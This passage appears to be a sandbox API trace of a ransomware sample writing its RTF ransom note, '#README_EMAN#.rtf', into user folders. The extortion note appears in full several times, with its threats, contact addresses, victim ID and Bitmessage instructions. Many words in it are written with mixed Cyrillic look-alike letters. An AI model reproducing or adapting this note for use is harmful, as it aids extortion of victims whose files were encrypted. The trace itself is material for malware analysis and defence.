ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.356] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.357] CloseHandle (hObject=0x294) returned 1 [0273.357] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0273.357] GetLastError () returned 0x2 [0273.357] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 